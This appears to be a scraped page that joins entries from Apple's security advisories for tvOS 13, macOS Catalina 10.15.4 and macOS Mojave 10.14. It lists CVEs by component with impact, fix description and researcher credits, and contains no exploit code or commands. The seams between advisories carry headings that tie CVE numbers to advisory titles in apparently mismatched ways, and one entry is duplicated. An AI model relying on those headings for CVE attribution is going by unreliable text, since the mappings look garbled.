CVE-2019-8703: an anonymous researcher

Entry added March 16, 2021

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption vulnerability was addressed with improved locking.

CVE-2019-8740: Mohamed Ghannam (@\_simo36)

Entry added October 29, 2019

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: A local app may be able to read a persistent account identifier

Description: A validation issue was addressed with improved logic.

CVE-2019-8809: Apple

Entry added October 29, 2019

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8712: Mohamed Ghannam (@\_simo36)

Entry added October 29, 2019

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: A malicious application may be able to determine kernel memory layout

Description: A memory corruption issue existed in the handling of IPv6 packets. This issue was addressed with improved memory management.

CVE-2019-8744: Zhuo Liang of Qihoo 360 Vulcan Team

Entry added October 29, 2019

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2019-8709: derrek (@derrekr6) derrek (@derrekr6)

Entry added October 29, 2019

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8717: Jann Horn of Google Project Zero

Entry added October 8, 2019

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: A malicious application may be able to determine kernel memory layout

Description: The issue was addressed with improved permissions logic.

CVE-2019-8780: Siguza

Entry added October 8, 2019

**Keyboards**

Available for: Apple TV 4K and Apple TV HD

Impact: A local user may be able to leak sensitive user information

Description: An authentication issue was addressed with improved state management.

CVE-2019-8704: 王 邦 宇 (wAnyBug.Com) of SAINTSEC

**libxml2**

Available for: Apple TV 4K and Apple TV HD

Impact: Multiple issues in libxml2

Description: Multiple memory corruption issues were addressed with improved input validation.

CVE-2019-8749: found by OSS-Fuzz

CVE-2019-8756: found by OSS-Fuzz

Entry added October 8, 2019

**libxslt**

Available for: Apple TV 4K and Apple TV HD

Impact: Multiple issues in libxslt

Description: Multiple memory corruption issues were addressed with improved input validation.

CVE-2019-8750: found by OSS-Fuzz

Entry added October 29, 2019

**mDNSResponder**

Available for: Apple TV 4K and Apple TV HD

Impact: An attacker in physical proximity may be able to passively observe device names in AWDL communications

Description: This issue was resolved by replacing device names with a random identifier.

CVE-2019-8799: David Kreitschmann and Milan Stute of Secure Mobile Networking Lab at Technische Universität Darmstadt

Entry added October 29, 2019

**UIFoundation**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a maliciously crafted text file may lead to arbitrary code execution

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2019-8745: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative

Entry added October 8, 2019

**UIFoundation**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8831: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative

Entry added November 18, 2019

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue was addressed with improved state management.

CVE-2019-8625: Sergei Glazunov of Google Project Zero

CVE-2019-8719: Sergei Glazunov of Google Project Zero

CVE-2019-8764: Sergei Glazunov of Google Project Zero

Entry added October 8, 2019, updated October 29, 2019

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8707: an anonymous researcher working with Trend Micro's Zero Day Initiative, cc working with Trend Micro Zero Day Initiative

CVE-2019-8710: found by OSS-Fuzz

CVE-2019-8726: Jihui Lu of Tencent KeenLab

CVE-2019-8728: Junho Jang of LINE Security Team and Hanul Choi of ABLY Corporation

CVE-2019-8733: Sergei Glazunov of Google Project Zero

CVE-2019-8734: found by OSS-Fuzz

CVE-2019-8735: G. Geshev working with Trend Micro Zero Day Initiative

CVE-2019-8743: zhunki from Codesafe Team of Legendsec at Qi'anxin Group

CVE-2019-8751: Dongzhuo Zhao working with ADLab of Venustech

CVE-2019-8752: Dongzhuo Zhao working with ADLab of Venustech

CVE-2019-8763: Sergei Glazunov of Google Project Zero

CVE-2019-8765: Samuel Groß of Google Project Zero

CVE-2019-8766: found by OSS-Fuzz

CVE-2019-8773: found by OSS-Fuzz

Entry added October 8, 2019, updated October 29, 2019

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A validation issue was addressed with improved logic.

CVE-2019-8762: Sergei Glazunov of Google Project Zero

Entry added November 18, 2019

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved validation.

CVE-2020-9932: Dongzhuo Zhao working with ADLab of Venustech

Entry added July 28, 2020

**Wi-Fi**

Available for: Apple TV 4K and Apple TV HD

Impact: A device may be passively tracked by its Wi-Fi MAC address

Description: A user privacy issue was addressed by removing the broadcast MAC address.

CVE-2019-8854: Ta-Lun Yen of UCCU Hacker and FuriousMacTeam of the United States Naval Academy and the Mitre Cooperation

Entry added December 4, 2019

CVE-2019-8703: About the security content of tvOS 13

A use after free issue was addressed with improved memory management. This issue is fixed in macOS Catalina 10.15.4, Security Update 2020-002 Mojave, Security Update 2020-002 High Sierra. A malicious application may be able to execute arbitrary code with kernel privileges.

Released March 24, 2020

**Accounts**

Available for: macOS Catalina 10.15.3

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: A logic issue was addressed with improved restrictions.

CVE-2020-9772: Allison Husain of UC Berkeley

Entry added May 21, 2020

**Apple HSSPI Support**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.3

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2020-3903: Proteas of Qihoo 360 Nirvan Team

Entry updated May 1, 2020

**AppleGraphicsControl**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.3

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: Multiple memory corruption issues were addressed with improved state management.

CVE-2020-3904: Proteas of Qihoo 360 Nirvan Team

**AppleMobileFileIntegrity**

Available for: macOS Catalina 10.15.3

Impact: An application may be able to use arbitrary entitlements

Description: This issue was addressed with improved checks.

CVE-2020-3883: Linus Henze (pinauten.de)

**Bluetooth**

Available for: macOS Catalina 10.15.3

Impact: An attacker in a privileged network position may be able to intercept Bluetooth traffic

Description: An issue existed with the use of a PRNG with low entropy. This issue was addressed with improved state management.

CVE-2020-6616: Jörn Tillmanns (@matedealer) and Jiska Classen (@naehrdine) of Secure Mobile Networking Lab

Entry added May 21, 2020

**Bluetooth**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.3

Impact: A malicious application may be able to determine kernel memory layout

Description: A memory corruption issue was addressed with improved validation.

CVE-2020-9853: Yu Wang of Didi Research America

Entry added May 21, 2020

**Bluetooth**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.3

Impact: A local user may be able to cause unexpected system termination or read kernel memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-3907: Yu Wang of Didi Research America

CVE-2020-3908: Yu Wang of Didi Research America

CVE-2020-3912: Yu Wang of Didi Research America

CVE-2020-9779: Yu Wang of Didi Research America

Entry updated September 21, 2020

**Bluetooth**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.3

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2020-3892: Yu Wang of Didi Research America

CVE-2020-3893: Yu Wang of Didi Research America

CVE-2020-3905: Yu Wang of Didi Research America

**Bluetooth**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6

Impact: An application may be able to read restricted memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2019-8853: Jianjun Dai of Qihoo 360 Alpha Lab

**Call History**

Available for: macOS Catalina 10.15.3

Impact: A malicious application may be able to access a user's call history

Description: This issue was addressed with a new entitlement.

CVE-2020-9776: Benjamin Randazzo (@\_\_\_\_benjamin)

**CoreBluetooth**

Available for: macOS Catalina 10.15.3

Impact: A remote attacker may be able to leak sensitive user information

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-9828: Jianjun Dai of Qihoo 360 Alpha Lab

Entry added May 13, 2020

**CoreFoundation**

Available for: macOS Catalina 10.15.3

Impact: A malicious application may be able to elevate privileges

Description: A permissions issue existed. This issue was addressed with improved permission validation.

CVE-2020-3913: Timo Christ of Avira Operations GmbH & Co. KG

**CoreText**

Available for: macOS Catalina 10.15.3

Impact: Processing a maliciously crafted text message may lead to application denial of service

Description: A validation issue was addressed with improved input sanitization.

CVE-2020-9829: Aaron Perris (@aaronp613), an anonymous researcher, an anonymous researcher, Carlos S Tech, Sam Menzies of Sam’s Lounge, Sufiyan Gouri of Lovely Professional University, India, Suleman Hasan Rathor of Arabic-Classroom.com

Entry added May 21, 2020

**CUPS**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.3

Impact: An application may be able to gain elevated privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2020-3898: Stephan Zeisberg (github.com/stze) of Security Research Labs (srlabs.de)

Entry added April 8, 2020

**FaceTime**

Available for: macOS Catalina 10.15.3

Impact: A local user may be able to view sensitive user information

Description: A logic issue was addressed with improved state management.

CVE-2020-3881: Yuval Ron, Amichai Shulman and Eli Biham of Technion - Israel Institute of Technology

**Intel Graphics Driver**

Available for: macOS Catalina 10.15.3

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2020-3886: Proteas

Entry added March 16, 2021

**Intel Graphics Driver**

Available for: macOS Catalina 10.15.3

Impact: A malicious application may disclose restricted memory

Description: An information disclosure issue was addressed with improved state management.

CVE-2019-14615: Wenjian HE of Hong Kong University of Science and Technology, Wei Zhang of Hong Kong University of Science and Technology, Sharad Sinha of Indian Institute of Technology Goa, and Sanjeev Das of University of North Carolina

**IOHIDFamily**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.3

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2020-3919: Alex Plaskett of F-Secure Consulting

Entry updated May 21, 2020

**IOThunderboltFamily**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6

Impact: An application may be able to gain elevated privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2020-3851: Xiaolong Bai and Min (Spark) Zheng of Alibaba Inc. and Luyi Xing of Indiana University Bloomington

**iTunes**

Available for: macOS Catalina 10.15.3

Impact: A malicious application may be able to overwrite arbitrary files

Description: This issue was addressed by removing the vulnerable code.

CVE-2020-3896: Christoph Falta

Entry added March 16, 2021

**Kernel**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.3

Impact: An application may be able to read restricted memory

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2020-3914: pattern-f (@pattern\_F\_) of WaCai

**Kernel**

Available for: macOS Catalina 10.15.3

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: Multiple memory corruption issues were addressed with improved state management.

CVE-2020-9785: Proteas of Qihoo 360 Nirvan Team

**libxml2**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.3

Impact: Multiple issues in libxml2

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2020-3909: LGTM.com

CVE-2020-3911: found by OSS-Fuzz

**libxml2**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.3

Impact: Multiple issues in libxml2

Description: A buffer overflow was addressed with improved size validation.

CVE-2020-3910: LGTM.com

**Mail**

Available for: macOS High Sierra 10.13.6, macOS Catalina 10.15.3

Impact: A remote attacker may be able to cause arbitrary javascript code execution

Description: An injection issue was addressed with improved validation.

CVE-2020-3884: Apple

**Printing**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.3

Impact: A malicious application may be able to overwrite arbitrary files

Description: A path handling issue was addressed with improved validation.

CVE-2020-3915: An anonymous researcher working with iDefense Labs (https://vcp.idefense.com/), HyungSeok Han (DaramG) @Theori working with TrendMicro’s Zero Day Initiative

Entry added May 1, 2020

**Safari**

Available for: macOS Catalina 10.15.3

Impact: A user's private browsing activity may be unexpectedly saved in Screen Time

Description: An issue existed in the handling of tabs displaying picture in picture video. The issue was corrected with improved state handling.

CVE-2020-9775: Andrian (@retroplasma), Marat Turaev, Marek Wawro (futurefinance.com) and Sambor Wawro of STO64 School Krakow Poland

Entry added May 13, 2020

**Sandbox**

Available for: macOS Catalina 10.15.3

Impact: A user may gain access to protected parts of the file system

Description: This issue was addressed with a new entitlement.

CVE-2020-9771: Csaba Fitzl (@theevilbit) of Offensive Security

Entry added May 21, 2020

**Sandbox**

Available for: macOS Catalina 10.15.3

Impact: A local user may be able to view sensitive user information

Description: An access issue was addressed with additional sandbox restrictions.

CVE-2020-3918: an anonymous researcher, Augusto Alvarez of Outcourse Limited

Entry added April 8, 2020, updated May 21, 2020

**sudo**

Available for: macOS Catalina 10.15.3

Impact: An attacker may be able to run commands as a non-existent user

Description: This issue was addressed by updating to sudo version 1.8.31.

CVE-2019-19232

**sysdiagnose**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6

Impact: An application may be able to trigger a sysdiagnose

Description: This issue was addressed with improved checks

CVE-2020-9786: Dayton Pidhirney (@\_watbulb) of Seekintoo (@seekintoo)

Entry added April 4, 2020

**TCC**

Available for: macOS Mojave 10.14.6, macOS Catalina 10.15.3

Impact: A maliciously crafted application may be able to bypass code signing enforcement

Description: A logic issue was addressed with improved restrictions.

CVE-2020-3906: Patrick Wardle of Jamf

**Time Machine**

Available for: macOS Catalina 10.15.3

Impact: A local user may be able to read arbitrary files

Description: A logic issue was addressed with improved state management.

CVE-2020-3889: Lasse Trolle Borup of Danish Cyber Defence

**Vim**

Available for: macOS Catalina 10.15.3

Impact: Multiple issues in Vim

Description: Multiple issues were addressed by updating to version 8.1.1850.

CVE-2020-9769: Steve Hahn of LinkedIn

**WebKit**

Available for: macOS Catalina 10.15.3

Impact: Some websites may not have appeared in Safari Preferences

Description: A logic issue was addressed with improved restrictions.

CVE-2020-9787: Ryan Pickren (ryanpickren.com)

Entry added April 8, 2020

**WebKit**

Available for: macOS Catalina 10.15.3

Impact: Processing maliciously crafted web content may lead to a cross site scripting attack

Description: An input validation issue was addressed with improved input validation.

CVE-2020-3902: Yiğit Can YILMAZ (@yilmazcanyigit)

Entry added July 28, 2020

CVE-2020-3886: About the security content of macOS Catalina 10.15.4, Security Update 2020-002 Mojave, Security Update 2020-002 High Sierra

CVE-2019-8643: Arun Sharma of VMWare This issue is fixed in macOS Mojave 10.14. Description: A logic issue was addressed with improved state management..

Released September 24, 2018

**Bluetooth**

Available for: iMac (21.5-inch, Late 2012), iMac (27-inch, Late 2012), iMac (21.5-inch, Late 2013), iMac (21.5-inch, Mid 2014), iMac (Retina 5K, 27-inch, Late 2014), iMac (21.5-inch, Late 2015), Mac mini (Mid 2011), Mac mini Server (Mid 2011), Mac mini (Late 2012), Mac mini Server (Late 2012), Mac mini (Late 2014), Mac Pro (Late 2013), MacBook Air (11-inch, Mid 2011), MacBook Air (13-inch, Mid 2011), MacBook Air (11-inch, Mid 2012), MacBook Air (13-inch, Mid 2012), MacBook Air (11-inch, Mid 2013), MacBook Air (13-inch, Mid 2013), MacBook Air (11-inch, Early 2015), MacBook Air (13-inch, Early 2015), MacBook Pro (13-inch, Mid 2012), MacBook Pro (15-inch, Mid 2012), MacBook Pro (Retina, 13-inch, Early 2013), MacBook Pro (Retina, 15-inch, Early 2013), MacBook Pro (Retina, 13-inch, Late 2013), and MacBook Pro (Retina, 15-inch, Late 2013)

Impact: An attacker in a privileged network position may be able to intercept Bluetooth traffic

Description: An input validation issue existed in Bluetooth. This issue was addressed with improved input validation.

CVE-2018-5383: Lior Neumann and Eli Biham

The updates below are available for these Mac models: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013, Mid 2010, and Mid 2012 models with recommended Metal-capable graphics processor, including MSI Gaming Radeon RX 560 and Sapphire Radeon PULSE RX 580)

**afpserver**

Impact: A remote attacker may be able to attack AFP servers through HTTP clients

Description: An input validation issue was addressed with improved input validation.

CVE-2018-4295: Jianjun Chen (@whucjj) from Tsinghua University and UC Berkeley

Entry added October 30, 2018

**App Store**

Impact: A malicious application may be able to determine the Apple ID of the owner of the computer

Description: A permissions issue existed in the handling of the Apple ID. This issue was addressed with improved access controls.

CVE-2018-4324: Sergii Kryvoblotskyi of MacPaw Inc.

**AppleGraphicsControl**

Impact: An application may be able to read restricted memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2018-4417: Lee of the Information Security Lab Yonsei University working with Trend Micro's Zero Day Initiative

Entry added October 30, 2018

**Application Firewall**

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: A configuration issue was addressed with additional restrictions.

CVE-2018-4353: Abhinav Bansal of LinkedIn Inc.

Entry updated October 30, 2018

**APR**

Impact: Multiple buffer overflow issues existed in Perl

Description: Multiple issues in Perl were addressed with improved memory handling.

CVE-2017-12613: Craig Young of Tripwire VERT

CVE-2017-12618: Craig Young of Tripwire VERT

Entry added October 30, 2018

**ATS**

Impact: A malicious application may be able to elevate privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2018-4411: lilang wu moony Li of Trend Micro working with Trend Micro's Zero Day Initiative

Entry added October 30, 2018

**ATS**

Impact: An application may be able to read restricted memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2018-4308: Mohamed Ghannam (@\_simo36)

Entry added October 30, 2018

**Auto Unlock**

Impact: A malicious application may be able to access local users AppleIDs

Description: A validation issue existed in the entitlement verification. This issue was addressed with improved validation of the process entitlement.

CVE-2018-4321: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc.

**CFNetwork**

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4126: Bruno Keith (@bkth\_) working with Trend Micro's Zero Day Initiative

Entry added October 30, 2018

**CoreFoundation**

Impact: A malicious application may be able to elevate privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2018-4412: The UK's National Cyber Security Centre (NCSC)

Entry added October 30, 2018

**CoreFoundation**

Impact: An application may be able to gain elevated privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2018-4414: The UK's National Cyber Security Centre (NCSC)

Entry added October 30, 2018

**CoreText**

Impact: Processing a maliciously crafted text file may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2018-4347: Vasyl Tkachuk of Readdle

Entry added October 30, 2018, updated December 13, 2018

**Crash Reporter**

Impact: An application may be able to read restricted memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2018-4333: Brandon Azad

**CUPS**

Impact: In certain configurations, a remote attacker may be able to replace the message content from the print server with arbitrary content

Description: An injection issue was addressed with improved validation.

CVE-2018-4153: Michael Hanselmann of hansmi.ch

Entry added October 30, 2018

**CUPS**

Impact: An attacker in a privileged position may be able to perform a denial of service attack

Description: A denial of service issue was addressed with improved validation.

CVE-2018-4406: Michael Hanselmann of hansmi.ch

Entry added October 30, 2018

**Dictionary**

Impact: Parsing a maliciously crafted dictionary file may lead to disclosure of user information

Description: A validation issue existed which allowed local file access. This was addressed with input sanitization.

CVE-2018-4346: Wojciech Reguła (@\_r3ggi) of SecuRing

Entry added October 30, 2018

**DiskArbitration**

Impact: A malicious application may be able to modify contents of the EFI system partition and execute arbitrary code with kernel privileges if secure boot is not enabled

Description: A permissions issue existed in DiskArbitration. This was addressed with additional ownership checks.

CVE-2018-4296: Vitaly Cheptsov

Entry updated January 22, 2019

**dyld**

Impact: A malicious application may be able to modify protected parts of the file system

Description: A configuration issue was addressed with additional restrictions.

CVE-2018-4433: Vitaly Cheptsov

Entry updated January 22, 2019

**fdesetup**

Impact: Institutional recovery keys may be incorrectly reported as present

Description: A logic issue was addressed with improved state management.

CVE-2019-8643: Arun Sharma of VMWare

Entry added August 1, 2019

**Firmware**

Impact: An attacker with physical access to a device may be able to elevate privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2017-5731: Intel and Eclypsium

CVE-2017-5732: Intel and Eclypsium

CVE-2017-5733: Intel and Eclypsium

CVE-2017-5734: Intel and Eclypsium

CVE-2017-5735: Intel and Eclypsium

Entry added June 24, 2019

**Grand Central Dispatch**

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4426: Brandon Azad

Entry added October 30, 2018

**Heimdal**

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4331: Brandon Azad

CVE-2018-4332: Brandon Azad

CVE-2018-4343: Brandon Azad

Entry added October 30, 2018

**Hypervisor**

Impact: Systems with microprocessors utilizing speculative execution and address translations may allow unauthorized disclosure of information residing in the L1 data cache to an attacker with local user access with guest OS privilege via a terminal page fault and a side-channel analysis

Description: An information disclosure issue was addressed by flushing the L1 data cache at the virtual machine entry.

CVE-2018-3646: Baris Kasikci, Daniel Genkin, Ofir Weisse, and Thomas F. Wenisch of University of Michigan, Mark Silberstein and Marina Minkin of Technion, Raoul Strackx, Jo Van Bulck, and Frank Piessens of KU Leuven, Rodrigo Branco, Henrique Kawakami, Ke Sun, and Kekai Hu of Intel Corporation, Yuval Yarom of The University of Adelaide

Entry added October 30, 2018

**iBooks**

Impact: Parsing a maliciously crafted iBooks file may lead to disclosure of user information

Description: A configuration issue was addressed with additional restrictions.

CVE-2018-4355: evi1m0 of bilibili security team

Entry added October 30, 2018

**Intel Graphics Driver**

Impact: An application may be able to read restricted memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2018-4396: Yu Wang of Didi Research America

CVE-2018-4418: Yu Wang of Didi Research America

Entry added October 30, 2018

**Intel Graphics Driver**

Impact: An application may be able to read restricted memory

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2018-4351: Appology Team @ Theori working with Trend Micro's Zero Day Initiative

Entry added October 30, 2018

**Intel Graphics Driver**

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2018-4350: Yu Wang of Didi Research America

Entry added October 30, 2018

**Intel Graphics Driver**

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4334: Ian Beer of Google Project Zero

Entry added October 30, 2018

**Intel Graphics Driver**

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2018-4451: Tyler Bohan of Cisco Talos

CVE-2018-4456: Tyler Bohan of Cisco Talos

Entry added December 21, 2018, updated January 22, 2019

**IOHIDFamily**

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2018-4408: Ian Beer of Google Project Zero

Entry added October 30, 2018, updated August 1, 2019

**IOKit**

Impact: A malicious application may be able to break out of its sandbox

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4341: Ian Beer of Google Project Zero

CVE-2018-4354: Ian Beer of Google Project Zero

Entry added October 30, 2018

**IOKit**

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2018-4383: Apple

Entry added October 30, 2018

**IOUserEthernet**

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4401: Apple

Entry added October 30, 2018

**Kernel**

Impact: A malicious application may be able to leak sensitive user information

Description: An access issue existed with privileged API calls. This issue was addressed with additional restrictions.

CVE-2018-4399: Fabiano Anemone (@anoane)

Entry added October 30, 2018

**Kernel**

Impact: An attacker in a privileged network position may be able to execute arbitrary code

Description: A memory corruption issue was addressed with improved validation.

CVE-2018-4407: Kevin Backhouse of Semmle Ltd.

Entry added October 30, 2018

**Kernel**

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4336: Brandon Azad

CVE-2018-4337: Ian Beer of Google Project Zero

CVE-2018-4340: Mohamed Ghannam (@\_simo36)

CVE-2018-4344: The UK's National Cyber Security Centre (NCSC)

CVE-2018-4425: cc working with Trend Micro's Zero Day Initiative, Juwei Lin (@panicaII) of Trend Micro working with Trend Micro's Zero Day Initiative

Entry updated October 30, 2018

**LibreSSL**

Impact: Multiple issues in libressl were addressed in this update

Description: Multiple issues were addressed by updating to libressl version 2.6.4.

CVE-2015-3194

CVE-2015-5333

CVE-2015-5334

CVE-2016-0702

Entry added October 30, 2018, updated December 13, 2018

**Login Window**

Impact: A local user may be able to cause a denial of service

Description: A validation issue was addressed with improved logic.

CVE-2018-4348: Ken Gannon of MWR InfoSecurity and Christian Demko of MWR InfoSecurity

Entry added October 30, 2018

**mDNSOffloadUserClient**

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4326: an anonymous researcher working with Trend Micro's Zero Day Initiative, Zhuo Liang of Qihoo 360 Nirvan Team

Entry added October 30, 2018

**MediaRemote**

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: An access issue was addressed with additional sandbox restrictions.

CVE-2018-4310: CodeColorist of Ant-Financial LightYear Labs

Entry added October 30, 2018

**Microcode**

Impact: Systems with microprocessors utilizing speculative execution and speculative execution of memory reads before the addresses of all prior memory writes are known may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis

Description: An information disclosure issue was addressed with a microcode update. This ensures that older data read from recently-written-to addresses cannot be read via a speculative side-channel.

CVE-2018-3639: Jann Horn (@tehjh) of Google Project Zero (GPZ), Ken Johnson of the Microsoft Security Response Center (MSRC)

Entry added October 30, 2018

**Security**

Impact: A local user may be able to cause a denial of service

Description: This issue was addressed with improved checks.

CVE-2018-4395: Patrick Wardle of Digita Security

Entry added October 30, 2018

**Security**

Impact: An attacker may be able to exploit weaknesses in the RC4 cryptographic algorithm

Description: This issue was addressed by removing RC4.

CVE-2016-1777: Pepi Zawodsky

**Spotlight**

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4393: Lufeng Li

Entry added October 30, 2018

**Symptom Framework**

Impact: An application may be able to read restricted memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2018-4203: Bruno Keith (@bkth\_) working with Trend Micro's Zero Day Initiative

Entry added October 30, 2018

**Text**

Impact: Processing a maliciously crafted text file may lead to a denial of service

Description: A denial of service issue was addressed with improved validation.

CVE-2018-4304: jianan.huang (@Sevck)

Entry added October 30, 2018

**Wi-Fi**

Impact: An application may be able to read restricted memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2018-4338: Lee @ SECLAB, Yonsei University working with Trend Micro's Zero Day Initiative

Entry added October 23, 2018

Tag

#apple